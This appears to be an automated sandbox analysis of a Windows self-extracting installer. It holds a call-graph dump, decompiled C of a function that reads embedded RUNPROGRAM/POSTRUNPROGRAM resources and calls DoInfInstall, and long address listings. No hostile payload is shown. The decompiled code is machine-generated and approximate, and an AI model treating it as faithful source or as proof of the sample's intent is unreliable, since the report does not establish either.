__set_app_type __p__fmode __p__commode 3148 a869f9 3147->3148 3149 a86a0e 3148->3149 3150 a86a02 __setusermatherr 3148->3150 3155 a871ef _controlfp 3149->3155 3150->3149 3152 a86a13 3154 a86fcf 3153->3154 3154->3147 3155->3152 3156 a834f0 3157 a83504 3156->3157 3158 a835b8 3156->3158 3157->3158 3159 a8351b 3157->3159 3160 a835be GetDesktopWindow 3157->3160 3161 a83671 EndDialog 3158->3161 3162 a83526 3158->3162 3164 a8354f 3159->3164 3165 a8351f 3159->3165 3163 a843d0 11 API calls 3160->3163 3161->3162 3166 a835d6 3163->3166 3164->3162 3168 a83559 ResetEvent 3164->3168 3165->3162 3167 a8352d TerminateThread EndDialog 3165->3167 3170 a8361d SetWindowTextA CreateThread 3166->3170 3171 a835e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3166->3171 3167->3162 3169 a844b9 20 API calls 3168->3169 3172 a83581 3169->3172 3170->3162 3173 a83646 3170->3173 3171->3170 3174 a8359b SetEvent 3172->3174 3176 a8358a SetEvent 3172->3176 3175 a844b9 20 API calls 3173->3175 3177 a83680 4 API calls 3174->3177 3175->3158 3176->3162 3177->3158 3178 a86ef0 3179 a86f2d 3178->3179 3181 a86f02 3178->3181 3180 a86f27 ?terminate@ 3180->3179 3181->3179 3181->3180 3182 a87270 _except_handler4_common 3063 a84cc0 GlobalFree 3064 a86f40 SetUnhandledExceptionFilter 3183 a84bc0 3185 a84bd7 3183->3185 3186 a84c05 3183->3186 3184 a84c1b SetFilePointer 3184->3185 3186->3184 3186->3185 3187 a830c0 3188 a830de CallWindowProcA 3187->3188 3189 a830ce 3187->3189 3190 a830da 3188->3190 3189->3188 3189->3190 3191 a863c0 3192 a86407 3191->3192 3193 a8658a CharPrevA 3192->3193 3194 a86415 CreateFileA 3193->3194 3195 a86448 WriteFile 3194->3195 3196 a8643a 3194->3196 3197 a86465 CloseHandle 3195->3197 3199 a86ce0 4 API calls 3196->3199 3197->3196 3200 a8648f 3199->3200 3201 a83100 3202 a831b0 3201->3202 3203 a83111 3201->3203 3204 a831b9 SendDlgItemMessageA 3202->3204 3207 a83141 3202->3207 3205 a83149 GetDesktopWindow 3203->3205 3209 a8311d 3203->3209 3204->3207 3208 a843d0 11 API calls 3205->3208 3206 
a83138 EndDialog 3206->3207 3210 a8315d 6 API calls 3208->3210 3209->3206 3209->3207 3210->3207 3211 a84200 3212 a8420b SendMessageA 3211->3212 3213 a8421e 3211->3213 3212->3213 3214 a86c03 3215 a86c1e 3214->3215 3216 a86c17 _exit 3214->3216 3217 a86c32 3215->3217 3218 a86c27 _cexit 3215->3218 3216->3215 3218->3217 3065 a84cd0 3066 a84d0b 3065->3066 3067 a84cf4 3065->3067 3068 a84d02 3066->3068 3071 a84dcb 3066->3071 3074 a84d25 3066->3074 3067->3068 3069 a84b60 FindCloseChangeNotification 3067->3069 3070 a86ce0 4 API calls 3068->3070 3069->3068 3073 a84e95 3070->3073 3072 a84dd4 SetDlgItemTextA 3071->3072 3075 a84de3 3071->3075 3072->3075 3074->3068 3088 a84c37 3074->3088 3075->3068 3093 a8476d 3075->3093 3078 a84e38 3078->3068 3080 a84980 25 API calls 3078->3080 3082 a84e56 3080->3082 3081 a84b60 FindCloseChangeNotification 3083 a84d99 SetFileAttributesA 3081->3083 3082->3068 3084 a84e64 3082->3084 3083->3068 3102 a847e0 LocalAlloc 3084->3102 3087 a84e6f 3087->3068 3089 a84c4c DosDateTimeToFileTime 3088->3089 3092 a84c88 3088->3092 3090 a84c5e LocalFileTimeToFileTime 3089->3090 3089->3092 3091 a84c70 SetFileTime 3090->3091 3090->3092 3091->3092 3092->3068 3092->3081 3111 a866ae GetFileAttributesA 3093->3111 3095 a8477b 3095->3078 3096 a847cc SetFileAttributesA 3097 a847db 3096->3097 3097->3078 3099 a86517 24 API calls 3100 a847b1 3099->3100 3100->3096 3100->3097 3101 a847c2 3100->3101 3101->3096 3103 a8480f LocalAlloc 3102->3103 3104 a847f6 3102->3104 3106 a8480b 3103->3106 3108 a84831 3103->3108 3105 a844b9 20 API calls 3104->3105 3105->3106 3106->3087 3109 a844b9 20 API calls 3108->3109 3110 a84846 LocalFree 3109->3110 3110->3106 3112 a84777 3111->3112 3112->3095 3112->3096 3112->3099 3113 a84ad0 3121 a83680 3113->3121 3116 a84ae9 3117 a84aee WriteFile 3118 a84b0f 3117->3118 3119 a84b14 3117->3119 3119->3118 3120 a84b3b SendDlgItemMessageA 3119->3120 3120->3118 3122 a83691 MsgWaitForMultipleObjects 3121->3122 3123 a836e8 3122->3123 3124 a836a9 PeekMessageA 
3122->3124 3123->3116 3123->3117 3124->3122 3127 a836bc 3124->3127 3125 a836c7 DispatchMessageA 3126 a836d1 PeekMessageA 3125->3126 3126->3127 3127->3122 3127->3123 3127->3125 3127->3126 3219 a83210 3220 a8328e EndDialog 3219->3220 3221 a83227 3219->3221 3236 a83239 3220->3236 3222 a833e2 GetDesktopWindow 3221->3222 3223 a83235 3221->3223 3225 a843d0 11 API calls 3222->3225 3227 a8324c 3223->3227 3228 a832dd GetDlgItemTextA 3223->3228 3223->3236 3226 a833f1 SetWindowTextA SendDlgItemMessageA 3225->3226 3229 a8341f GetDlgItem EnableWindow 3226->3229 3226->3236 3230 a83251 3227->3230 3231 a832c5 EndDialog 3227->3231 3237 a832fc 3228->3237 3252 a83366 3228->3252 3229->3236 3232 a8325c LoadStringA 3230->3232 3230->3236 3231->3236 3234 a8327b 3232->3234 3235 a83294 3232->3235 3233 a844b9 20 API calls 3233->3236 3240 a844b9 20 API calls 3234->3240 3257 a84224 LoadLibraryA 3235->3257 3239 a83331 GetFileAttributesA 3237->3239 3237->3252 3243 a8337c 3239->3243 3244 a8333f 3239->3244 3240->3220 3242 a832a5 SetDlgItemTextA 3242->3234 3242->3236 3245 a8658a CharPrevA 3243->3245 3246 a844b9 20 API calls 3244->3246 3247 a8338d 3245->3247 3248 a83351 3246->3248 3249 a858c8 27 API calls 3247->3249 3248->3236 3250 a8335a CreateDirectoryA 3248->3250 3251 a83394 3249->3251 3250->3243 3250->3252 3251->3252 3253 a833a4 3251->3253 3252->3233 3254 a833c7 EndDialog 3253->3254 3255 a8597d 34 API calls 3253->3255 3254->3236 3256 a833c3 3255->3256 3256->3236 3256->3254 3258 a843b2 3257->3258 3259 a84246 GetProcAddress 3257->3259 3263 a844b9 20 API calls 3258->3263 3260 a8425d GetProcAddress 3259->3260 3261 a843a4 FreeLibrary 3259->3261 3260->3261 3262 a84274 GetProcAddress 3260->3262 3261->3258 3262->3261 3264 a8428b 3262->3264 3265 a8329d 3263->3265 3266 a84295 GetTempPathA 3264->3266 3270 a842e1 3264->3270 3265->3236 3265->3242 3267 a842ad 3266->3267 3267->3267 3268 a842b4 CharPrevA 3267->3268 3269 a842d0 CharPrevA 3268->3269 3268->3270 3269->3270 3271 a84390 FreeLibrary 3270->3271 
3271->3265 3272 a84a50 3273 a84a9f ReadFile 3272->3273 3274 a84a66 3272->3274 3275 a84abb 3273->3275 3274->3275 3276 a84a82 memcpy 3274->3276 3276->3275 3277 a83450 3278 a8345e 3277->3278 3279 a834d3 EndDialog 3277->3279 3281 a8349a GetDesktopWindow 3278->3281 3285 a83465 3278->3285 3280 a8346a 3279->3280 3282 a843d0 11 API calls 3281->3282 3283 a834ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3282->3283 3283->3280 3284 a8348c EndDialog 3284->3280 3285->3280 3285->3284

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph (function a83ba2; legend: Executed / Not Executed; graph image not preserved)
C-Code - Quality: 82%
E00A83BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
	signed int _t164;
	void* _t165;

	_t164 = (_t162 & 0xfffffff8) - 0x194;
	_t69 =  *0xa88004; // 0xd891196d
	_v8 = _t69 ^ _t164;
	_t153 = 0;
	 *0xa89124 =  *0xa89124 & 0;
	_t149 = 0;
	_v388 = 0;
	_v384 = 0;
	_t165 =  *0xa88a28 - _t153; // 0x0
	if(_t165 != 0) {
		L3:
		_t127 = 0;
		_v392 = 0;
		while(1) {
			_v400 = _v400 & 0x00000000;
			memset( &_v348, 0, 0x44);
			_t164 = _t164 + 0xc;
			_v348 = 0x44;
			if( *0xa88c42 != 0) {
				goto L26;
			}
			_t146 =  &_v396;
			_t115 = E00A8468F("SHOWWINDOW",  &_v396, 4);
			if(_t115 == 0 || _t115 > 4) {
				L25:
				_t146 = 0x4b1;
				E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
				 *0xa89124 = 0x80070714;
				goto L62;
			} else {
				if(_v396 != 1) {
					__eflags = _v396 - 2;
					if(_v396 != 2) {
						_t137 = 3;
						__eflags = _v396 - _t137;
						if(_v396 == _t137) {
							_v304 = 1;
							_v300 = _t137;
						}
						goto L14;
					}
					_push(6);
					_v304 = 1;
					_pop(0);
					goto L11;
				} else {
					_v304 = 1;
					L11:
					_v300 = 0;
					L14:
					if(_t127 != 0) {
						L27:
						_t155 = 1;
						__eflags = _t127 - 1;
						if(_t127 != 1) {
							L31:
							_t132 =  &_v280;
							_t76 = E00A81AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                              										__eflags = _t76;
                                                                                                                                                                                                                                              										if(_t76 == 0) {
                                                                                                                                                                                                                                              											L62:
                                                                                                                                                                                                                                              											_t77 = 0;
                                                                                                                                                                                                                                              											L63:
                                                                                                                                                                                                                                              											_pop(_t150);
                                                                                                                                                                                                                                              											_pop(_t156);
                                                                                                                                                                                                                                              											_pop(_t128);
                                                                                                                                                                                                                                              											return E00A86CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t157 = _v404;
                                                                                                                                                                                                                                              										__eflags = _t149;
                                                                                                                                                                                                                                              										if(_t149 != 0) {
                                                                                                                                                                                                                                              											L37:
                                                                                                                                                                                                                                              											__eflags = _t157;
                                                                                                                                                                                                                                              											if(_t157 == 0) {
                                                                                                                                                                                                                                              												L57:
                                                                                                                                                                                                                                              												_t151 = _v408;
                                                                                                                                                                                                                                              												_t146 =  &_v352;
                                                                                                                                                                                                                                              												_t130 = _t151; // executed
                                                                                                                                                                                                                                              												_t79 = E00A83FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                              												__eflags = _t79;
                                                                                                                                                                                                                                              												if(_t79 == 0) {
                                                                                                                                                                                                                                              													L61:
                                                                                                                                                                                                                                              													LocalFree(_t151);
                                                                                                                                                                                                                                              													goto L62;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												L58:
                                                                                                                                                                                                                                              												LocalFree(_t151);
                                                                                                                                                                                                                                              												_t127 = _t127 + 1;
                                                                                                                                                                                                                                              												_v396 = _t127;
                                                                                                                                                                                                                                              												__eflags = _t127 - 2;
                                                                                                                                                                                                                                              												if(_t127 >= 2) {
                                                                                                                                                                                                                                              													_t155 = 1;
                                                                                                                                                                                                                                              													__eflags = 1;
                                                                                                                                                                                                                                              													L69:
                                                                                                                                                                                                                                              													__eflags =  *0xa88580;
                                                                                                                                                                                                                                              													if( *0xa88580 != 0) {
                                                                                                                                                                                                                                              														E00A82267();
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              													_t77 = _t155;
                                                                                                                                                                                                                                              													goto L63;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												_t153 = _v392;
                                                                                                                                                                                                                                              												_t149 = _v388;
                                                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											L38:
                                                                                                                                                                                                                                              											__eflags =  *0xa88180;
                                                                                                                                                                                                                                              											if( *0xa88180 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c7;
                                                                                                                                                                                                                                              												E00A844B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              												LocalFree(_v424);
                                                                                                                                                                                                                                              												 *0xa89124 = 0x8007042b;
                                                                                                                                                                                                                                              												goto L62;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t157;
                                                                                                                                                                                                                                              											if(_t157 == 0) {
                                                                                                                                                                                                                                              												goto L57;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0xa89a34 & 0x00000004;
                                                                                                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                                                                                                              												goto L57;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t129 = E00A86495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                              											__eflags = _t129;
                                                                                                                                                                                                                                              											if(_t129 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c8;
                                                                                                                                                                                                                                              												E00A844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                              												L65:
                                                                                                                                                                                                                                              												LocalFree(_v408);
                                                                                                                                                                                                                                              												 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              												goto L62;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                              											_v404 = _t146;
                                                                                                                                                                                                                                              											__eflags = _t146;
                                                                                                                                                                                                                                              											if(_t146 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c9;
                                                                                                                                                                                                                                              												__eflags = 0;
                                                                                                                                                                                                                                              												E00A844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                              												FreeLibrary(_t129);
                                                                                                                                                                                                                                              												goto L65;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0xa88a30;
                                                                                                                                                                                                                                              											_t151 = _v408;
                                                                                                                                                                                                                                              											_v384 = 0;
                                                                                                                                                                                                                                              											_v368 =  &_v280;
                                                                                                                                                                                                                                              											_t96 =  *0xa89a40; // 0x3
                                                                                                                                                                                                                                              											_v364 = _t96;
                                                                                                                                                                                                                                              											_t97 =  *0xa88a38 & 0x0000ffff;
                                                                                                                                                                                                                                              											_v380 = 0xa89154;
                                                                                                                                                                                                                                              											_v376 = _t151;
                                                                                                                                                                                                                                              											_v372 = 0xa891e4;
                                                                                                                                                                                                                                              											_v360 = _t97;
                                                                                                                                                                                                                                              											if( *0xa88a30 != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t144 =  *0xa89a34; // 0x1
                                                                                                                                                                                                                                              											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                              											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                              											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t145 =  *0xa88d48; // 0x0
                                                                                                                                                                                                                                              											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                              											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t145;
                                                                                                                                                                                                                                              											if(_t145 < 0) {
                                                                                                                                                                                                                                              												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                              												__eflags = _t104;
                                                                                                                                                                                                                                              												_v360 = _t104;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t98 =  *0xa89a38; // 0x0
                                                                                                                                                                                                                                              											_v356 = _t98;
                                                                                                                                                                                                                                              											_t130 = _t146;
                                                                                                                                                                                                                                              											 *0xa8a288( &_v384);
                                                                                                                                                                                                                                              											_t101 = _v404();
                                                                                                                                                                                                                                              											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                              											if(_t164 != _t164) {
                                                                                                                                                                                                                                              												_t130 = 4;
                                                                                                                                                                                                                                              												asm("int 0x29");
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											 *0xa89124 = _t101;
                                                                                                                                                                                                                                              											_push(_t129);
                                                                                                                                                                                                                                              											__eflags = _t101;
                                                                                                                                                                                                                                              											if(_t101 < 0) {
                                                                                                                                                                                                                                              												FreeLibrary();
                                                                                                                                                                                                                                              												goto L61;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												FreeLibrary();
                                                                                                                                                                                                                                              												_t127 = _v400;
                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags =  *0xa89a40 - 1; // 0x3
                                                                                                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                                                                                                              											goto L37;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags =  *0xa88a20;
                                                                                                                                                                                                                                              										if( *0xa88a20 == 0) {
                                                                                                                                                                                                                                              											goto L37;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t157;
                                                                                                                                                                                                                                              										if(_t157 != 0) {
                                                                                                                                                                                                                                              											goto L38;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_v388 = 1;
                                                                                                                                                                                                                                              										E00A8202A(_t146); // executed
                                                                                                                                                                                                                                              										goto L37;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t146 =  &_v280;
                                                                                                                                                                                                                                              									_t108 = E00A8468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                              									__eflags = _t108;
                                                                                                                                                                                                                                              									if(_t108 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0xa88c42;
                                                                                                                                                                                                                                              									if( *0xa88c42 != 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                              									__eflags = _t112 == 0;
                                                                                                                                                                                                                                              									if(_t112 == 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t118 =  *0xa88a38; // 0x0
                                                                                                                                                                                                                                              								if(_t118 == 0) {
                                                                                                                                                                                                                                              									L23:
                                                                                                                                                                                                                                              									if(_t153 != 0) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E00A8468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                              										goto L27;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L25;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                              									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              										goto L62;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t140 = "USRQCMD";
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E00A8468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                              										_t153 = 1;
                                                                                                                                                                                                                                              										_v388 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L26:
                                                                                                                                                                                                                                              						_push(_t130);
                                                                                                                                                                                                                                              						_t146 = 0x104;
                                                                                                                                                                                                                                              						E00A81781( &_v276, 0x104, _t130, 0xa88c42);
                                                                                                                                                                                                                                              						goto L27;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t130 = "REBOOT";
                                                                                                                                                                                                                                              				_t125 = E00A8468F(_t130, 0xa89a2c, 4);
                                                                                                                                                                                                                                              				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                              					goto L25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}
                                                                                                                                                                                                                                              0x00a83c03
                                                                                                                                                                                                                                              0x00a83c11
                                                                                                                                                                                                                                              0x00a83c16
                                                                                                                                                                                                                                              0x00a83c19
                                                                                                                                                                                                                                              0x00a83c28
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83c30
                                                                                                                                                                                                                                              0x00a83c39
                                                                                                                                                                                                                                              0x00a83c40
                                                                                                                                                                                                                                              0x00a83d13
                                                                                                                                                                                                                                              0x00a83d15
                                                                                                                                                                                                                                              0x00a83d21
                                                                                                                                                                                                                                              0x00a83d26
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83c4f
                                                                                                                                                                                                                                              0x00a83c56
                                                                                                                                                                                                                                              0x00a83c60
                                                                                                                                                                                                                                              0x00a83c65
                                                                                                                                                                                                                                              0x00a83c77
                                                                                                                                                                                                                                              0x00a83c78
                                                                                                                                                                                                                                              0x00a83c7c
                                                                                                                                                                                                                                              0x00a83c7e
                                                                                                                                                                                                                                              0x00a83c82
                                                                                                                                                                                                                                              0x00a83c82
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83c7c
                                                                                                                                                                                                                                              0x00a83c67
                                                                                                                                                                                                                                              0x00a83c69
                                                                                                                                                                                                                                              0x00a83c6d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83c58
                                                                                                                                                                                                                                              0x00a83c58
                                                                                                                                                                                                                                              0x00a83c6e
                                                                                                                                                                                                                                              0x00a83c6e
                                                                                                                                                                                                                                              0x00a83c87
                                                                                                                                                                                                                                              0x00a83c89
                                                                                                                                                                                                                                              0x00a83d4d
                                                                                                                                                                                                                                              0x00a83d4f
                                                                                                                                                                                                                                              0x00a83d50
                                                                                                                                                                                                                                              0x00a83d52
                                                                                                                                                                                                                                              0x00a83d9e
                                                                                                                                                                                                                                              0x00a83da8
                                                                                                                                                                                                                                              0x00a83daf
                                                                                                                                                                                                                                              0x00a83db4
                                                                                                                                                                                                                                              0x00a83db6
                                                                                                                                                                                                                                              0x00a83f4d
                                                                                                                                                                                                                                              0x00a83f4d
                                                                                                                                                                                                                                              0x00a83f4f
                                                                                                                                                                                                                                              0x00a83f56
                                                                                                                                                                                                                                              0x00a83f57
                                                                                                                                                                                                                                              0x00a83f58
                                                                                                                                                                                                                                              0x00a83f63
                                                                                                                                                                                                                                              0x00a83f63
                                                                                                                                                                                                                                              0x00a83dbc
                                                                                                                                                                                                                                              0x00a83dc0
                                                                                                                                                                                                                                              0x00a83dc2
                                                                                                                                                                                                                                              0x00a83de6
                                                                                                                                                                                                                                              0x00a83de6
                                                                                                                                                                                                                                              0x00a83de8
                                                                                                                                                                                                                                              0x00a83f0b
                                                                                                                                                                                                                                              0x00a83f0b
                                                                                                                                                                                                                                              0x00a83f0f
                                                                                                                                                                                                                                              0x00a83f13
                                                                                                                                                                                                                                              0x00a83f15
                                                                                                                                                                                                                                              0x00a83f1a
                                                                                                                                                                                                                                              0x00a83f1c
                                                                                                                                                                                                                                              0x00a83f46
                                                                                                                                                                                                                                              0x00a83f47
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83f47
                                                                                                                                                                                                                                              0x00a83f1e
                                                                                                                                                                                                                                              0x00a83f1f
                                                                                                                                                                                                                                              0x00a83f25
                                                                                                                                                                                                                                              0x00a83f26
                                                                                                                                                                                                                                              0x00a83f2a
                                                                                                                                                                                                                                              0x00a83f2d
                                                                                                                                                                                                                                              0x00a83fd9
                                                                                                                                                                                                                                              0x00a83fd9
                                                                                                                                                                                                                                              0x00a83fda
                                                                                                                                                                                                                                              0x00a83fda
                                                                                                                                                                                                                                              0x00a83fe1
                                                                                                                                                                                                                                              0x00a83fe3
                                                                                                                                                                                                                                              0x00a83fe3
                                                                                                                                                                                                                                              0x00a83fe8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83fe8
                                                                                                                                                                                                                                              0x00a83f33
                                                                                                                                                                                                                                              0x00a83f37
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83f37
                                                                                                                                                                                                                                              0x00a83dee
                                                                                                                                                                                                                                              0x00a83dee
                                                                                                                                                                                                                                              0x00a83df5
                                                                                                                                                                                                                                              0x00a83fad
                                                                                                                                                                                                                                              0x00a83fb9
                                                                                                                                                                                                                                              0x00a83fc2
                                                                                                                                                                                                                                              0x00a83fc8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83fc8
                                                                                                                                                                                                                                              0x00a83dfb
                                                                                                                                                                                                                                              0x00a83dfd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83e03
                                                                                                                                                                                                                                              0x00a83e0a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83e15
                                                                                                                                                                                                                                              0x00a83e17
                                                                                                                                                                                                                                              0x00a83e19
                                                                                                                                                                                                                                              0x00a83d35
                                                                                                                                                                                                                                              0x00a83d35
                                                                                                                                                                                                                                              0x00a83d3c
                                                                                                                                                                                                                                              0x00a83d48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83d48
                                                                                                                                                                                                                                              0x00a83c03
                                                                                                                                                                                                                                              0x00a83be2
                                                                                                                                                                                                                                              0x00a83be7
                                                                                                                                                                                                                                              0x00a83bee
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A83C11
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A83CDC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A88C42), ref: 00A83D8F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A83E26
